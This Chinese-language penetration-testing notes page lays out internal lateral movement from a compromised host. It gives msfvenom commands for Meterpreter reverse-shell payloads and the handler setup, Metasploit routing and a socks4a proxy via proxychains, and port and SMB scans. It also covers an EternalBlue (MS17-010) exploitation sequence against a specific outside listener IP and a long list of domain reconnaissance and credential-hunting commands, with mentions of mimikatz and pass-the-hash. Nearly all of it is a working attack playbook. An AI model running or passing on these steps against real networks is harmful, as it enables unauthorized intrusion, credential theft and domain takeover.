內網橫向思路
當已經拿到一台機器的shell之后,需要進行內網繼續滲透過程。通過自己的實踐,得出以下滲透思路。
服務器信息收集
當前shell機器信息收集,獲取敏感信息。詳細可以看DC1靶場思路,主要是文件敏感信息獲取及操作系統有關知識
補充:
-
利用 cs上線受害機
詳細看cs使用教程
-
利用mimikatz獲取管理員用戶密碼
注意首先需要提權
-
或者新建賬戶
內網信息收集和目標定位
-
生成后門木馬,獲取會話
生成木馬: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe 監聽模塊: use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST <IP> set LPORT 1122 set ExitOnSession false // exploit -j -z //將會話在后台掛起 退出命令行,將會話掛到后台 background 重新進入會話 sessions 1 -
通過會話進入命令行,查看受害機信息
ipconfig 獲取受害機網卡和ip信息。可以推測內網ip段 arp -a 查看arp緩存,得到內網路由,進一步的到內網信息 -
可以使用讓受害機訪問外網,本機代理抓包爆破的方式,確定其真實IP
-
msf增加路由:route add 192.168.0.0 255.255.255.0 2,然后查看路由 route print
(如果linux里面有多塊網卡時,給會話增加一條默認內網路由讓其在內網通信)
msf內網路由、代理設置
在進行內網橫向滲透之前有一步非常重要,就是在收集內網信息之后給會話設置內網路由,然后設置代理。
-
設置會話路由(給建立的會話指定路由到內網,與內網進行通信)
在msf中給會話設置路由 route add 192.168.52.0 255.255.255.0 1 內網ip段 子網掩碼 會話id 查看路由 route print -
設置本地代理(建立一個socket隧道,使得msf(程序)的流量通過socket代理能夠通過路由進入內網通信)
在msf中配置代理 1.打開/etc/proxychains.conf將端口設置為 1080 vi /etc/proxychains.conf [proxylist] socks4 127.0.0.1 1080 2. use auxiliary/sever/socks4a set srvhost 127.0.0.1 run
內網資產掃描
- 使用輔助端口掃描模塊掃描,查看所需設置的值.(內網段內主機在線情況及端口開放情況)
use auxiliary/scanner/portscan/tcp
set RHOSTs 192.168.52.0/24
set PORTS 445 3389 6379 80 8080 22
exploit
內網SMB信息掃描
查看139和445端口的開放情況
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.201-203
exploit
永恆之藍攻擊
-
查看開放了445端口的機器是否存在永恆之藍漏洞
auxiliary/scanner/smb/smb_ms17_010 set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.0.201-203 run -
使用永恆之藍進行攻擊
use exploit/windows/smb/ms17_010_psexec set payload windows/x64/meterpreter/reverse_tcp set lhost 47.92.248.200 set rhost 192.168.0.202 set lport 32323
主要進行域滲透拿到域控的那台主機的權限
拿下一台內網機器,首先要定位內網機器的架構。
收集基本信息:
ipconfig /all ------ 查詢本機IP段,所在域等
net user ------ 本機用戶列表
net localgroup administrators ------ 本機管理員[通常含有域用戶]
net user /domain ------ 查詢域用戶
net ``group` `/domain ------ 查詢域里面的工作組
net ``group` `"domain admins"` `/domain ------ 查詢域管理員用戶組
net localgroup administrators /domain ------ 登錄本機的域管理員
net localgroup administrators workgroup\user001 /add ------域用戶添加到本機
net ``group` `"domain controllers"` `/domain ------ 查看域控制器(如果有多台)
net time /domain ------ 判斷主域,主域服務器都做時間服務器
net config workstation ------ 當前登錄域
net session ------ 查看當前會話
net use \\ip\ipc$ pawword /user:username ------ 建立IPC會話[空連接-***]
net share ------ 查看SMB指向的路徑[即共享]
net view ------ 查詢同一域內機器列表
net view \\ip ------ 查詢某IP共享
net view /domain ------ 查詢域列表
net view /domain:domainname ------ 查看workgroup域中計算機列表
net start ------ 查看當前運行的服務
net accounts ------ 查看本地密碼策略
net accounts /domain ------ 查看域密碼策略
nbtstat –A ip ------netbios 查詢
netstat –an/ano/anb ------ 網絡連接查詢
route print ------ 路由表tasklist /V ----- 查看進程[顯示對應用戶]
tasklist /S ip /U domain\username /P /V ----- 查看遠程計算機進程列表
qprocess * ----- 類似tasklist
qprocess /SERVER:IP ----- 遠程查看計算機進程列表
nslookup –qt-MX Yahoo.com ----- 查看郵件服務器
whoami /all ----- 查詢當前用戶權限等
set` `----- 查看系統環境變量
systeminfo ----- 查看系統信息
qwinsta ----- 查看登錄情況
qwinsta /SERVER:IP ----- 查看遠程登錄情況
fsutil fsinfo drives ----- 查看所有盤符
gpupdate /force ----- 更新域策略cmdkey /l ----- 看是否保存了登陸憑證。(攻擊者會先查看管理員是否保留了登陸憑證,方便后續的憑證抓取。) echo %logonserver% ----- 查看登陸域
域滲透文章 https://www.cnblogs.com/bmjoker/p/10336247.html
注意hash傳遞攻擊
具體詳細步驟請看內網穿透這篇文章